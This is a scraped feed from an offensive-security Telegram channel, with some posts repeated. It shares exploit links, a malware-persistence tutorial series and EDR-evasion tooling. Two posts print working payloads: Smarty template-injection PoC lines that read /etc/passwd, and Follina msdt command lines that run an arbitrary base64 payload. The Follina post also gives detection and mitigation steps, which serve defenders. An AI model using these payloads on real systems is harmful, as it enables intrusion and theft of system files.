CVE-2022-22954-main.zip
3.5 KB
⭕️VMware Workspace ONE Access and Identity Manager RCE via SSTI.
exploit+payload+shodan
#vmware #cve
@securation
CVE-2022-22954 - PoC SSTI
*exploit+payload+shodan
#vmware #cve
@securation
⭕️
#shellcode #bypass #edr #av
@securation
New technique for shellcode injection to evade AVs and EDRs
https://github.com/Idov31/FunctionStomping#shellcode #bypass #edr #av
@securation
GitHub
GitHub - Idov31/FunctionStomping: Shellcode injection technique. Given as C++ header, standalone Rust program or library.
Shellcode injection technique. Given as C++ header, standalone Rust program or library. - Idov31/FunctionStomping
⭕️ Malware development: persistence - part 1. Registry run keys. C++ example.
Malware development: persistence - part 2. Screensaver hijack. C++ example.
Malware development: persistence - part 3. COM DLL hijack.
Malware development: persistence - part 4. Windows services. Simple C++ example.
Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.
Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.
Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example.
#malware #dev #cpp
@securation
Malware development: persistence - part 2. Screensaver hijack. C++ example.
Malware development: persistence - part 3. COM DLL hijack.
Malware development: persistence - part 4. Windows services. Simple C++ example.
Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example.
Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example.
Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example.
#malware #dev #cpp
@securation
🔥3
⭕️ اکسپلویت OOB XXE از طریق متد LOCK در HTTP
https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/
در ارائه زیر که مربوط به کنفرانس Zero Night میشه درباره WebDav XXE attacks صحبت شده ، که متد های PROPPATCH ، PROPFIND ، LOCK و ... XML رو به عنوان ورودی قبول میکنن . و به این موضوع که مخصوصا پیاده سازی های با جاوا آسیب پذیر اند اشاره میکنه.
https://2015.zeronights.org/assets/files/35-Egorov.pdf
#WebDav #LOCK #XXE
@securation
https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/
در ارائه زیر که مربوط به کنفرانس Zero Night میشه درباره WebDav XXE attacks صحبت شده ، که متد های PROPPATCH ، PROPFIND ، LOCK و ... XML رو به عنوان ورودی قبول میکنن . و به این موضوع که مخصوصا پیاده سازی های با جاوا آسیب پذیر اند اشاره میکنه.
https://2015.zeronights.org/assets/files/35-Egorov.pdf
#WebDav #LOCK #XXE
@securation
Geek Freak
Exploiting Out-Of-Band XXE on Wildfire
Data Exfiltration using XXE via HTTP LOCK Method
🔥7👍1
👍2
⭕️ Exploiting a heap overflow in the FreeBSD Wi-fi stack
https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack
#heap #freebsd #wifi
@securation
https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack
#heap #freebsd #wifi
@securation
👍2
⭕️Smarty PHP Code Injection
< 3.1.45 / >= 4.0.0 / < 4.1.1
CVE-2022-29221
PoC:
@securation
< 3.1.45 / >= 4.0.0 / < 4.1.1
CVE-2022-29221
PoC:
{block name='*/phpinfo();/*'}{/block}
{include file='string:*/include"/etc/passwd";exit;/*' inline=1}
#1DAY #smarty #web @securation
👍7🔥1
⭕️ در initial access که جزیی از پروسه Red Teaming و در حملات Client access هست، ما تکنیک های متفاوتی میتوانیم اجرا کنیم اعم از macro ها در نرم افزار های گروه آفیس و...
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:
ماشین حساب اجرا میشه
و با اجرای :
اگر جای base64_payload پیلود ما باشه اجرا میشه .
برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.
#redteam #follina #exploit #analysis
@securation
حالا آسیب پذیری RCE را بررسی میکنیم که در ویژگی شبیه macro به اسم remote template که با پروتکلی به اسم MSDT این اتفاق صورت میگیره که باید گفت بر روی wordو teams و Excel و outlook و Foxit PDF صورت میگیره ناگفته نمونه که به تنهایی هم میتوان با استفاده از اکسپلویت و اجرای دستورات هم از این آسیب پذیری بهره ببریم که در واقع ما میتونیم به صورت ریموت یک فایل html را اجرا کنیم , چون ربطی به ماکرو ها نداره ما ماکرو رو هم غیر فعال کنیم ازین تکنیک میتوان استفاده کرد.
حالا نکته ای که هست
با اجرای این خط کامند:
msdt /id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/system32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"
ماشین حساب اجرا میشه
و با اجرای :
msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\"اگر جای base64_payload پیلود ما باشه اجرا میشه .
برای اجرای این مورد میتوان از روشهای زیر استفاده کرد :
https://github.com/Hrishikesh7665/Follina_Exploiter_CLI
https://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina
https://github.com/JohnHammond/msdt-follina
از این ابزار ها میتوان به راحتی استفاده کرد.
https://github.com/rayorole/CVE-2022-30190
این هم فایل HTML مورد نظر هستش
بعد از تست آسیب پذیری میرسه به اینکه باید چکار کرد؟
اول برای تست کردن اینکه آیا فایلی آلوده هست یا خیر , دو راه هست
راه اول اینه که فایل دریافتی را به zip تبدیل کنیم و \word_rels\Document.xml.rels رو بررسی کنیم, برای اینکار ابزاری برای تست فایل ها در این لینک هست.
در ادامه برای جلوگیری از این آسیب پذیری هم در رجیستری مسیر HKEY_CLASSES_ROOT\ms-msdt را حذف میکنیم.
نکته دیگه ای که هست حالا ما برای شناسایی اینکه ایا اجرا شده این اسیب پذیری در سیستممون یا خیر چه باید کنیم؟
اگر به صورت کامندی صورت گرفته باشه باید
در پروسه ها به دنبال msdt و sdiaghost و conhost بگردیم
حالا اگر وردی اجرا شود , پروسه winword و msiexec و mshta و msdt مشکوک میتونه باشه. نکته بعدی که میتونه اهمیت داشته باشه
به هر طریقی که ما اجرا کنیم
یک فایل xml ایجاد میشه که مشخص میکنه این اتفاق افتاده(البته خیلی این مورد اهمیت نداره چونن میتونه هکر بعد از اقدامش پاکشون کنه )
در مسیر appdata/local/diagnostics هستش.
#redteam #follina #exploit #analysis
@securation
Telegram
Security Analysis
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
🔥11👍5
FLARE Obfuscated String Solver - Automatically extract obfuscated strings from malware.
https://github.com/mandiant/flare-floss
#malware #R_String #FLARE
@securation
https://github.com/mandiant/flare-floss
#malware #R_String #FLARE
@securation
🔥2
exploiting an out-of-bounds access in the netfilter subsystem to achieve an info-leak. The article also suggests a potential approach to gain privilege escalation.
https://www.randorisec.fr/yet-another-bug-netfilter/
#cve #netfilter
@securation
https://www.randorisec.fr/yet-another-bug-netfilter/
#cve #netfilter
@securation
👍4👎1
⭕️VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive
https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/
@securation
https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/
@securation
Horizon3.ai
VMware Authentication Bypass Vulnerability (CVE-2022-22972) Technical Deep Dive
Technical deep dive into VMware’s recently patched authentication bypass vulnerability allowing an attacker to login as any known local user.
👎1